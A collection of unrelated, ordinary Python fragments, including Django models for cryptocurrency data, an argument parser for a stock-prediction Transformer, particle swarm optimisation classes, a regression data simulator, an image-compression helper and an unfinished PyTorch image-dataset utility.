"step-4": "<mask token>\n\n\nclass crontab(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass converter(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass MainTable(models.Model):\n rank = models.IntegerField(null=True)\n coinid = models.CharField(max_length=30, null=True)\n symbol = models.CharField(max_length=10)\n name = models.CharField(max_length=30)\n thumbimg = models.CharField(max_length=30)\n marketcap = models.FloatField(null=True)\n totalvolume = models.FloatField(null=True)\n price_change = models.FloatField(null=True)\n pricechangepercentage = models.FloatField(null=True)\n onehourchange = models.FloatField(null=True)\n sevendaychange = models.FloatField(null=True)\n circulating_supply = models.FloatField(null=True)\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)\n",
"step-5": "from django.db import models\n\nclass crontab(models.Model):\n name = models.CharField(max_length=20)\n\n\nclass converter(models.Model):\n name = models.CharField(max_length=20)\n\nclass MainTable(models.Model):\n rank = models.IntegerField(null=True)\n coinid = models.CharField(max_length=30,null=True)\n symbol = models.CharField(max_length=10)\n name = models.CharField(max_length=30)\n thumbimg = models.CharField(max_length=30)\n marketcap = models.FloatField(null=True)\n totalvolume = models.FloatField(null=True)\n price_change = models.FloatField(null=True)\n pricechangepercentage = models.FloatField(null=True)\n onehourchange = models.FloatField(null=True)\n sevendaychange = models.FloatField(null=True)\n circulating_supply = models.FloatField(null=True)\n\nclass Table(models.Model):\n name = models.CharField(max_length=30)\n coinid = models.CharField(max_length=30)\n symbol = models.CharField(max_length=20)\n img = models.CharField(max_length=50)\n image = models.CharField(max_length=50)\n\nclass Price(models.Model):\n price = models.FloatField(null=True)\n\nclass Marketdata(models.Model):\n price_change_24h = models.FloatField(null=True)\n price_change_percentage_24h = models.FloatField(null=True)",
"step-ids": [
5,
6,
10,
12,
14
]
}
|
[
5,
6,
10,
12,
14
] |
from argparse import ArgumentParser, Namespace


def parse_arguments() -> Namespace:
    """
    Parse arguments
    :return: Arguments
    """
    parser = ArgumentParser(description='DLP project: Stock Prediction using Transformer')
    parser.add_argument('-e', '--epochs', default=10, type=int,
                        help='Number of epochs')
    parser.add_argument('-w', '--warmup', default=2, type=int,
                        help='Number of epochs for warmup')
    parser.add_argument('-l', '--learning_rate', default=0.001, type=float,
                        help='Learning rate')
    parser.add_argument('-b', '--batch_size', default=64, type=int,
                        help='Batch size')
    parser.add_argument('-s', '--seq_len', default=128, type=int,
                        help='Sequence length (consecutive days)')
    parser.add_argument('-ne', '--num_encoders', default=3, type=int,
                        help='Number of transformer encoder in the network')
    parser.add_argument('-a', '--attn_dim', default=96, type=int,
                        help='Dimension of single attention output')
    parser.add_argument('-nh', '--num_heads', default=12, type=int,
                        help='Number of heads for multi-attention')
    parser.add_argument('-d', '--dropout_rate', default=0.3, type=float,
                        help='Dropout rate')
    parser.add_argument('-hs', '--hidden_size', default=256, type=int,
                        help='Hidden size between the linear layers in the encoder')
    parser.add_argument('-loss', '--loss_function', default='l2', type=str, choices=['l1', 'l2'],
                        help='Loss function')
    parser.add_argument('-i', '--inference_only', action='store_true',
                        help='Inference only or not')
    parser.add_argument('-r', '--root_dir', default='archive', type=str,
                        help='Directory containing the downloaded data')
    parser.add_argument('-v', '--verbosity', default=0, type=int, choices=[0, 1, 2],
                        help='Verbosity level')
    return parser.parse_args()
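
# Minimal usage sketch (assumption, not part of the original module):
#
# if __name__ == '__main__':
#     args = parse_arguments()
#     print(args.epochs, args.batch_size, args.loss_function)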
|
normal
|
{
"blob_id": "81573b4a57f540733ff2faaf82bab78381b9dd46",
"index": 1194,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_arguments() ->Namespace:\n \"\"\"\n Parse arguments\n :return: Arguments\n \"\"\"\n parser = ArgumentParser(description=\n 'DLP project: Stock Prediction using Transformer')\n parser.add_argument('-e', '--epochs', default=10, type=int, help=\n 'Number of epochs')\n parser.add_argument('-w', '--warmup', default=2, type=int, help=\n 'Number of epochs for warmup')\n parser.add_argument('-l', '--learning_rate', default=0.001, type=float,\n help='Learning rate')\n parser.add_argument('-b', '--batch_size', default=64, type=int, help=\n 'Batch size')\n parser.add_argument('-s', '--seq_len', default=128, type=int, help=\n 'Sequence length (consecutive days)')\n parser.add_argument('-ne', '--num_encoders', default=3, type=int, help=\n 'Number of transformer encoder in the network')\n parser.add_argument('-a', '--attn_dim', default=96, type=int, help=\n 'Dimension of single attention output')\n parser.add_argument('-nh', '--num_heads', default=12, type=int, help=\n 'Number of heads for multi-attention')\n parser.add_argument('-d', '--dropout_rate', default=0.3, type=float,\n help='Dropout rate')\n parser.add_argument('-hs', '--hidden_size', default=256, type=int, help\n ='Hidden size between the linear layers in the encoder')\n parser.add_argument('-loss', '--loss_function', default='l2', type=str,\n choices=['l1', 'l2'], help='Loss function')\n parser.add_argument('-i', '--inference_only', action='store_true', help\n ='Inference only or not')\n parser.add_argument('-r', '--root_dir', default='archive', type=str,\n help='Directory containing the downloaded data')\n parser.add_argument('-v', '--verbosity', default=0, type=int, choices=[\n 0, 1, 2], help='Verbosity level')\n return parser.parse_args()\n",
"step-3": "from argparse import ArgumentParser, Namespace\n\n\ndef parse_arguments() ->Namespace:\n \"\"\"\n Parse arguments\n :return: Arguments\n \"\"\"\n parser = ArgumentParser(description=\n 'DLP project: Stock Prediction using Transformer')\n parser.add_argument('-e', '--epochs', default=10, type=int, help=\n 'Number of epochs')\n parser.add_argument('-w', '--warmup', default=2, type=int, help=\n 'Number of epochs for warmup')\n parser.add_argument('-l', '--learning_rate', default=0.001, type=float,\n help='Learning rate')\n parser.add_argument('-b', '--batch_size', default=64, type=int, help=\n 'Batch size')\n parser.add_argument('-s', '--seq_len', default=128, type=int, help=\n 'Sequence length (consecutive days)')\n parser.add_argument('-ne', '--num_encoders', default=3, type=int, help=\n 'Number of transformer encoder in the network')\n parser.add_argument('-a', '--attn_dim', default=96, type=int, help=\n 'Dimension of single attention output')\n parser.add_argument('-nh', '--num_heads', default=12, type=int, help=\n 'Number of heads for multi-attention')\n parser.add_argument('-d', '--dropout_rate', default=0.3, type=float,\n help='Dropout rate')\n parser.add_argument('-hs', '--hidden_size', default=256, type=int, help\n ='Hidden size between the linear layers in the encoder')\n parser.add_argument('-loss', '--loss_function', default='l2', type=str,\n choices=['l1', 'l2'], help='Loss function')\n parser.add_argument('-i', '--inference_only', action='store_true', help\n ='Inference only or not')\n parser.add_argument('-r', '--root_dir', default='archive', type=str,\n help='Directory containing the downloaded data')\n parser.add_argument('-v', '--verbosity', default=0, type=int, choices=[\n 0, 1, 2], help='Verbosity level')\n return parser.parse_args()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#===============================================================================
# @author: Daniel V. Stankevich
# @organization: RMIT, School of Computer Science, 2012
#
#
# This package contains representations of the following models:
# 'Particle' - an atomic element
# 'Swarm' - a set of particles
#    'Neighbourhood'        - particle topology
# 'KnapsackSolution' - representation for solution of the problem
# 'TSPSolution' - representation for solution of the problem
#===============================================================================
#===============================================================================
# GENERIC MODELS
#===============================================================================
#---- Particle representation
class ParticleModel:
_position = None
_velocity = None
_bestPosition = None
_nbBestPosition = None
_fitness = -1
def __init__(self):
self._position = None
self._velocity = None
self._bestPosition = None
self._nbBestPosition = None
self._fitness = -1
#---- Swarm representation
class SwarmModel:
_particles = None
_neighbourhoods = None
_bestPosition = None
_bestPositionFitness = -1
def __init__(self):
self._particles = []
self._neighbourhoods = None
self._bestPosition = None
self._bestPositionFitness = -1
#---- Neighbourhood representation
class NeighbourhoodModel:
_particles = []
_bestPosition = None
_bestPositionFitness = -1
def __init__(self, particles):
self._particles = particles
self._bestPosition = None
self._bestPositionFitness = -1
#===============================================================================
# PROBLEM SPECIFIC MODELS
#===============================================================================
#---- Knapsack Problem Solution representation
class KnapsackSolutionModel:
_items = []
_knapsackSize = None
def __init__(self, items, size):
self._items = items
self._knapsackSize = size
#---- TSP Problem Solution representation
class TSPSolutionModel:
_edges = {}
_startNode = None
_numOfCities = None
_bestPath = []
def __init__(self, edges, numOfCities, startNode):
self._edges = edges
self._numOfCities = numOfCities
self._startNode = startNode
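
# Illustrative composition sketch (an assumption, not part of the original
# package): two particles sharing a single fully-connected neighbourhood.
#
# p1, p2 = ParticleModel(), ParticleModel()
# swarm = SwarmModel()
# swarm._particles = [p1, p2]
# swarm._neighbourhoods = [NeighbourhoodModel([p1, p2])]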
|
normal
|
{
"blob_id": "5c06229f8e80a7225620f25941cc5276a9021e53",
"index": 5353,
"step-1": "<mask token>\n\n\nclass SwarmModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-2": "<mask token>\n\n\nclass SwarmModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-3": "<mask token>\n\n\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-4": "class ParticleModel:\n _position = None\n _velocity = None\n _bestPosition = None\n _nbBestPosition = None\n _fitness = -1\n\n def __init__(self):\n self._position = None\n self._velocity = None\n self._bestPosition = None\n self._nbBestPosition = None\n self._fitness = -1\n\n\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-5": "#===============================================================================\n# @author: Daniel V. Stankevich\n# @organization: RMIT, School of Computer Science, 2012\n#\n#\n# This package contains representations of the following models:\n# 'Particle' - an atomic element\n# 'Swarm' - a set of particles\n# 'Neighbourhood' - particles topology\n# 'KnapsackSolution' - representation for solution of the problem\n# 'TSPSolution' - representation for solution of the problem\n#===============================================================================\n\n\n\n#===============================================================================\n# GENERIC MODELS\n#===============================================================================\n\n#---- Particle representation\nclass ParticleModel:\n _position = None\n _velocity = None\n _bestPosition = None\n _nbBestPosition = None\n _fitness = -1\n\n def __init__(self):\n self._position = None\n self._velocity = None\n self._bestPosition = None\n self._nbBestPosition = None\n self._fitness = -1\n\n#---- Swarm representation\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = -1\n \n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n \n\n#---- Neighbourhood representation \nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n \n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\n#===============================================================================\n# PROBLEM SPECIFIC MODELS\n#===============================================================================\n\n#---- Knapsack Problem Solution representation \nclass KnapsackSolutionModel:\n _items = [] \n _knapsackSize = None\n \n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n#---- TSP Problem Solution representation\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n \n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode",
"step-ids": [
10,
11,
12,
15,
16
]
}
|
[
10,
11,
12,
15,
16
] |
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
import random
def sim_data():
# Parameters
n_samples = random.randint(500, 5000)
n_features = random.randint(5, 25)
n_informative = random.randint(5, n_features)
noise = random.uniform(0.5, 2)
# Simulate data
X, y = make_regression(n_samples=n_samples,
n_features=n_features,
n_informative=n_informative,
noise=noise)
# Train test split
X_train, X_test, y_train, y_test = train_test_split(X, y)
# Param dict
params = {"n_samples": n_samples,
"n_features": n_features,
"n_informative": n_informative,
"noise": noise}
# Return
return X_train, y_train, X_test, y_test, params
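
# Quick usage sketch (assumption, not part of the original file): fit a
# baseline model on one simulated split and report its held-out R^2.
#
# from sklearn.linear_model import LinearRegression
#
# X_train, y_train, X_test, y_test, params = sim_data()
# model = LinearRegression().fit(X_train, y_train)
# print(params, model.score(X_test, y_test))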
|
flexible
|
{
"blob_id": "c4aa5869d5f916f13aa924c19dc9792337619b31",
"index": 4011,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sim_data():\n n_samples = random.randint(500, 5000)\n n_features = random.randint(5, 25)\n n_informative = random.randint(5, n_features)\n noise = random.uniform(0.5, 2)\n X, y = make_regression(n_samples=n_samples, n_features=n_features,\n n_informative=n_informative, noise=noise)\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n params = {'n_samples': n_samples, 'n_features': n_features,\n 'n_informative': n_informative, 'noise': noise}\n return X_train, y_train, X_test, y_test, params\n",
"step-3": "from sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nimport random\n\n\ndef sim_data():\n n_samples = random.randint(500, 5000)\n n_features = random.randint(5, 25)\n n_informative = random.randint(5, n_features)\n noise = random.uniform(0.5, 2)\n X, y = make_regression(n_samples=n_samples, n_features=n_features,\n n_informative=n_informative, noise=noise)\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n params = {'n_samples': n_samples, 'n_features': n_features,\n 'n_informative': n_informative, 'noise': noise}\n return X_train, y_train, X_test, y_test, params\n",
"step-4": "from sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nimport random\n\ndef sim_data():\n\n # Parameters\n n_samples = random.randint(500, 5000)\n n_features = random.randint(5, 25)\n n_informative = random.randint(5, n_features)\n noise = random.uniform(0.5, 2)\n\n # Simulate data\n X, y = make_regression(n_samples=n_samples,\n n_features=n_features,\n n_informative=n_informative,\n noise=noise)\n\n # Train test split\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n\n # Param dict\n params = {\"n_samples\": n_samples,\n \"n_features\": n_features,\n \"n_informative\": n_informative,\n \"noise\": noise}\n\n # Return\n return X_train, y_train, X_test, y_test, params\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
Pide una cadena y un carácter por teclado y muestra cuantas veces aparece el carácter en la cadena.
Autor: David Galván Fontalba
Fecha: 27/10/2019
Algoritmo:
Pido un cadena
Pido un caracter
contador en 0
Hago una variable que empieza siendo 0, i
mientras i <= len(cadena)
si cadena[i] == caracter
contador +1
si no
i +1
fin
"""
print("Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.")
print("----------------------------------------------------------------------------------------------------------------------------------\n")
ourString = input("Escribe lo que quieras: ")
ourChar = input("Escribe un solo carácter: ")
counter = 0
i = 0
while i < len(ourString) :
if ourString[i] == ourChar :
counter += 1
i += 1
print(f"\nEl carácter {ourChar} aparece {counter} veces.")
|
normal
|
{
"blob_id": "65301be73bb56147609a103a932266013c3c0bd6",
"index": 1148,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n 'Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.'\n )\nprint(\n \"\"\"----------------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n )\n<mask token>\nwhile i < len(ourString):\n if ourString[i] == ourChar:\n counter += 1\n i += 1\nprint(f\"\"\"\nEl carácter {ourChar} aparece {counter} veces.\"\"\")\n",
"step-3": "<mask token>\nprint(\n 'Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.'\n )\nprint(\n \"\"\"----------------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n )\nourString = input('Escribe lo que quieras: ')\nourChar = input('Escribe un solo carácter: ')\ncounter = 0\ni = 0\nwhile i < len(ourString):\n if ourString[i] == ourChar:\n counter += 1\n i += 1\nprint(f\"\"\"\nEl carácter {ourChar} aparece {counter} veces.\"\"\")\n",
"step-4": "\"\"\"\r\nPide una cadena y un carácter por teclado y muestra cuantas veces aparece el carácter en la cadena.\r\n\r\nAutor: David Galván Fontalba\r\nFecha: 27/10/2019\r\n\r\nAlgoritmo:\r\nPido un cadena\r\nPido un caracter\r\ncontador en 0\r\nHago una variable que empieza siendo 0, i\r\nmientras i <= len(cadena)\r\n si cadena[i] == caracter\r\n contador +1\r\n si no\r\n i +1\r\nfin\r\n\"\"\"\r\nprint(\"Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.\")\r\nprint(\"----------------------------------------------------------------------------------------------------------------------------------\\n\")\r\n\r\nourString = input(\"Escribe lo que quieras: \")\r\nourChar = input(\"Escribe un solo carácter: \")\r\n\r\ncounter = 0\r\ni = 0\r\nwhile i < len(ourString) :\r\n if ourString[i] == ourChar :\r\n counter += 1\r\n i += 1\r\nprint(f\"\\nEl carácter {ourChar} aparece {counter} veces.\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
""" Image Check / Compress Image"""
import re
import os
from PIL import Image
from common.constant import PATH
def check_image(file_type):
    # Anchor on the MIME prefix: the original pattern "image/*" also matched
    # strings such as "imagery" ("image" plus zero slashes).
    match = re.match(r"image/.+", file_type)
    return match
def compress_image(data):
with open(PATH.format(data['name']), 'wb+') as file:
file.write(data['binary'])
image = Image.open(PATH.format(data['name']))
new_img = image.resize((128, 128))
new_img.save(PATH.format(data['name']))
with open(PATH.format(data['name']), 'rb') as image_file:
image = image_file.read()
os.remove(PATH.format(data['name']))
return image
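
# Usage sketch (assumption, not part of the original module): PATH is expected
# to be a format string such as '/tmp/{}' naming a writable scratch directory.
#
# with open('photo.jpg', 'rb') as f:
#     payload = {'name': 'photo.jpg', 'binary': f.read()}
# if check_image('image/jpeg'):
#     thumbnail_bytes = compress_image(payload)  # 128x128 image bytes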
|
normal
|
{
"blob_id": "13fa650557a4a8827c9fb2e514bed178df19a32c",
"index": 1295,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_image(file_type):\n match = re.match('image/*', file_type)\n return match\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_image(file_type):\n match = re.match('image/*', file_type)\n return match\n\n\ndef compress_image(data):\n with open(PATH.format(data['name']), 'wb+') as file:\n file.write(data['binary'])\n image = Image.open(PATH.format(data['name']))\n new_img = image.resize((128, 128))\n new_img.save(PATH.format(data['name']))\n with open(PATH.format(data['name']), 'rb') as image_file:\n image = image_file.read()\n os.remove(PATH.format(data['name']))\n return image\n",
"step-4": "<mask token>\nimport re\nimport os\nfrom PIL import Image\nfrom common.constant import PATH\n\n\ndef check_image(file_type):\n match = re.match('image/*', file_type)\n return match\n\n\ndef compress_image(data):\n with open(PATH.format(data['name']), 'wb+') as file:\n file.write(data['binary'])\n image = Image.open(PATH.format(data['name']))\n new_img = image.resize((128, 128))\n new_img.save(PATH.format(data['name']))\n with open(PATH.format(data['name']), 'rb') as image_file:\n image = image_file.read()\n os.remove(PATH.format(data['name']))\n return image\n",
"step-5": "\"\"\" Image Check / Compress Image\"\"\"\n\nimport re\nimport os\nfrom PIL import Image\n\nfrom common.constant import PATH\n\n\ndef check_image(file_type):\n match = re.match(\"image/*\", file_type)\n return match\n\n\ndef compress_image(data):\n with open(PATH.format(data['name']), 'wb+') as file:\n file.write(data['binary'])\n image = Image.open(PATH.format(data['name']))\n new_img = image.resize((128, 128))\n new_img.save(PATH.format(data['name']))\n\n with open(PATH.format(data['name']), 'rb') as image_file:\n image = image_file.read()\n os.remove(PATH.format(data['name']))\n return image\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from dai_imports import *
from obj_utils import *
import utils
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_ = None, obj = False,
minorities = None, diffs = None, bal_tfms = None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
        assert transforms_ is not None, 'Please pass some transforms.'
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
# print(self.tfms)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s,tuple):
s = s[0]
row_scale = s/img.size[0]
col_scale = s/img.size[1]
y = rescale_bbox(y,row_scale,col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = (y,y2)
return (x,y)
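
# Wiring sketch (assumption, not part of the original file): using the csv
# dataset with a DataLoader directly, outside of DataProcessor.
#
# tfms = [transforms.Resize((224, 224)), transforms.ToTensor()]
# ds = my_image_csv_dataset('data/train', train_df, transforms_=tfms)
# dl = torch.utils.data.DataLoader(ds, batch_size=32, shuffle=True)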
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None,
loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform,
target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self,index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self.transform )
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
def extract_data(dt):
x = []
y = []
for a,b in dt:
x.append(a)
y.append(b)
return x,y
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def get_minorities(df,thresh=0.8):
c = df.iloc[:,1].value_counts()
lc = list(c)
max_count = lc[0]
diffs = [1-(x/max_count) for x in lc]
diffs = dict((k,v) for k,v in zip(c.keys(),diffs))
minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]
return minorities,diffs
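
# Worked example (illustrative): with class counts {'cat': 100, 'dog': 60,
# 'fox': 20} and thresh=0.8, max_count is 100, so 'dog' (60 < 80) and 'fox'
# (20 < 80) are minorities, with balancing diffs of 0.4 and 0.8 respectively.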
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name,name)
new_path = img_dest/new_name
# print(new_path)
os.rename(i,new_path)
tr_images.append(new_name)
tr_labels.append(label)
# os.rmdir(l)
tr_img_label = {'Img':tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a,e):
a = [x+e for x in a]
return a
def one_hot(targets, multi = False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot,binerizer.classes_
def get_index(arr,a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb,row_scale,col_scale):
bb = bb.reshape((-1,4))
for b in bb:
r1,c1,r2,c2 = b
b[0] = int(np.round(r1*col_scale))
b[1] = int(np.round(c1*row_scale))
b[2] = int(np.round(r2*col_scale))
b[3] = int(np.round(c2*row_scale))
# bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])
# for b in bb:
# r1,c1,r2,c2 = b
# b[0] = int(np.round(r1*row_scale))
# b[1] = int(np.round(c1*col_scale))
# b[2] = int(np.round(r2*row_scale))
# b[3] = int(np.round(c2*col_scale))
# if(sum(b)) == 1:
# b[0],b[1],b[2],b[3] = 0,0,0,0
bb = bb.reshape((1,-1))
return bb
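
# Worked example (illustrative): an image of size (width=100, height=200)
# resized to 224x224 gives row_scale=2.24 and col_scale=1.12, so the box
# [10, 20, 50, 80] (r1, c1, r2, c2) becomes [11, 45, 56, 179] after rounding.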
def get_img_stats(dataset,sz):
size = int(len(dataset)*sz)
i = 0
imgs = []
for img,_ in dataset:
# print(img.size())
if i > size:
break
imgs.append(img)
i+=1
imgs_ = torch.stack(imgs,dim=3)
imgs_ = imgs_.view(3,-1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean,imgs_std
def split_df(train_df, test_size=0.15):
    try:
        # stratified split keeps class proportions when the target column allows it
        train_df, val_df = train_test_split(train_df, test_size=test_size, random_state=2, stratify=train_df.iloc[:, 1])
    except Exception:
        # fall back to a plain split (e.g. regression or tensor targets)
        train_df, val_df = train_test_split(train_df, test_size=test_size, random_state=2)
    train_df = train_df.reset_index(drop=True)
    val_df = val_df.reset_index(drop=True)
    return train_df, val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,
tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,
val_csv,reg,tr_name,val_name,test_name,extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self,split_size = 0.15):
data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)
# check if paths given and also set paths
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path,tr_name)
val_path = os.path.join(data_path,val_name)
test_path = os.path.join(data_path,test_name)
if os.path.exists(os.path.join(data_path,tr_name+'.csv')):
train_csv = tr_name+'.csv'
# if os.path.exists(os.path.join(data_path,val_name+'.csv')):
# val_csv = val_name+'.csv'
# if os.path.exists(os.path.join(data_path,test_name+'.csv')):
# test_csv = test_name+'.csv'
        # paths to csv; test_csv is only discovered when the csvs are built from folders
        test_csv = None
        if not train_csv:
